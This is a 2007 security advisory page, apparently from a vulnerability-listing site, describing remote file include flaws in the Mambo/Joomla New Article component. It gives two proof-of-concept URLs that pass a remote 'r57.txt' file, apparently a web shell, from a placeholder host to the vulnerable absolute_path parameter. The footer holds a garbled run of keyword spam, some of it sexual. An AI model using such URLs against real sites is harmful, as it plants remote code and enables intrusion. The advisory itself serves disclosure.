about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Mambo/Joomla New Article Component Absolute_Path Multiple Remote File Include Vulnerabilities


Title Mambo/Joomla New Article Component Absolute_Path Multiple Remote File Include Vulnerabilities
Published 2007-04-16-12:00AM
Updated 2007-04-17-03:11AM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Cold z3ro is credited with discovering these issues.
Vulnerable  Mambo New Article Component 1.1
Not Vulnerable  
Code   Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/joomla_path/components/com_articles.php?absolute_path=http://www.example2.com/r57.txt?
http://www.example.com/classes/html/com_articles.php?absolute_path=http://www.example2.com/r57.txt?
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 21 Nov 2009 00:45:54 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Himachi www.hgjmw. news for c www.tkyxgl good site 6trooncam carta de a nuqfihoaaz index.php? 3.1p1 petek din Microsoft Powered by naked scho Www..sexxy megyn pric news for c www.tkyxgl wwa.net.ru news for c www.kamasu Ayu azhari Snehased Milw orm . www.xtxia. indean sax www.p0551. news for c Www.thamil indean sax 200 /compo indean sax Fxploits Necked sex mod_ssl 2. CAN-2003- Sex4000 www.5199.w namithasti Minta dong animalssex Sex videos all passwo news for c modernbill Sma video www.echina Www.Sex Oc phpbb/send Mjk